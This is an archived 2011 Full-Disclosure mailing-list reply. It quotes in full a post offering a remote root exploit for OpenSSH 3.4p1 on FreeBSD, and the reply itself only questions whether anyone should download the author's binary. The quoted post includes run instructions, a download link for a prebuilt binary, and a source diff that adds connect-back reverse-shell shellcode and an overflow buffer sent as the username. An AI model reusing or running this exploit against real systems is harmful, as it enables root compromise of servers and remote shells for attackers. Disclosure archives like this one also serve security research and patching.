lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 1 Jul 2011 16:47:23 +0100
From: Benji <me@...ji.com>
To: "HI-TECH ." <isowarez.isowarez.isowarez@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Working Remote Root Exploit for OpenSSH 3.4p1
	(FreeBSD)

So you want people to download your statically linked binary?

On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH . <
isowarez.isowarez.isowarez@...glemail.com> wrote:

> OpenSSH FreeBSD Remote Root Exploit
> By Kingcope
> Year 2011
>
> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
> run like ./ssh -1 -z <yourip> <target>
> setup a netcat, port 443 on yourip first
>
> a statically linked linux binary of the exploit can be found below
> attached is a diff to openssh-5.8p2.
>
> the statically linked binary can be downloaded from
> http://isowarez.de/ssh_0day
>
> I know these versions are really old, some seem to run
> that tough.
>
> -Cheers, King "the archaeologist" Cope
>
> diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
> 149a150
> > char *myip;
> 195a197,203
> > "OpenSSH FreeBSD Remote Root Exploit\n"
> > "By Kingcope\n"
> > "Year 2011\n\n"
> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> > "run like ./ssh -1 -z <yourip> <target>\n"
> > "setup a netcat, port 443 on yourip first\n\n"
> 299c307
> <       while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
> ---
> >       while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
> 335a344,346
> >                       break;
> >               case 'z':
> >                       myip = optarg;
> diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
> 667a668,719
> > //IP=\xc0\xa8\x20\x80
> > #define       IPADDR  "\xc0\xa8\x20\x80"
> > #define PORT  "\x27\x10"              /* htons(10000) */
> >
> > char sc[] =
> >    "\x90\x90"
> >    "\x90\x90"
> >    "\x31\xc9"                 // xor    ecx, ecx
> >    "\xf7\xe1"                 // mul    ecx
> >    "\x51"                     // push   ecx
> >    "\x41"                     // inc    ecx
> >    "\x51"                     // push   ecx
> >    "\x41"                     // inc    ecx
> >    "\x51"                     // push   ecx
> >    "\x51"                     // push   ecx
> >    "\xb0\x61"                 // mov    al, 97
> >    "\xcd\x80"                 // int    80h
> >    "\x89\xc3"                 // mov    ebx, eax
> >    "\x68"IPADDR                       // push   dword 0101017fh
> >    "\x66\x68"PORT             // push   word 4135
> >    "\x66\x51"                 // push   cx
> >    "\x89\xe6"                 // mov    esi, esp
> >    "\xb2\x10"                 // mov    dl, 16
> >    "\x52"                     // push   edx
> >    "\x56"                     // push   esi
> >    "\x50"                     // push   eax
> >    "\x50"                     // push   eax
> >    "\xb0\x62"                 // mov    al, 98
> >    "\xcd\x80"                 // int    80h
> >    "\x41"                     // inc    ecx
> >    "\xb0\x5a"                 // mov    al, 90
> >    "\x49"                     // dec    ecx
> >    "\x51"                     // push   ecx
> >    "\x53"                     // push   ebx
> >    "\x53"                     // push   ebx
> >    "\xcd\x80"                 // int    80h
> >    "\x41"                     // inc    ecx
> >    "\xe2\xf5"                 // loop   -10
> >    "\x51"                     // push   ecx
> >    "\x68\x2f\x2f\x73\x68"     // push   dword 68732f2fh
> >    "\x68\x2f\x62\x69\x6e"     // push   dword 6e69622fh
> >    "\x89\xe3"                 // mov    ebx, esp
> >    "\x51"                     // push   ecx
> >    "\x54"                     // push   esp
> >    "\x53"                     // push   ebx
> >    "\x53"                     // push   ebx
> >    "\xb0\xc4\x34\xff"
> >    "\xcd\x80";                // int    80h
> >
> >
> > extern char *myip;
> >
> 678a731,748
> >
> >       char buffer[100000];
> >
> >       printf("OpenSSH Remote Root Exploit\n");
> >       printf("By Kingcope\n");
> >       printf("Year 2011\n\n");
> >       printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> >       printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> >       printf("Connect back to: %s:443\n", myip);
> >
> >       *((unsigned long*)(sc + 21)) = inet_addr(myip);
> >       *((unsigned short*)(sc + 27)) = htons(443);
> >
> >       memset(buffer, 'V', 8096);
> >       memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1
> FreeBSD-20020702
> >       memset(buffer+28, '\x90', 65535);
> >       memcpy(buffer+28+65535, sc, sizeof(sc));
> >       server_user=buffer;
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists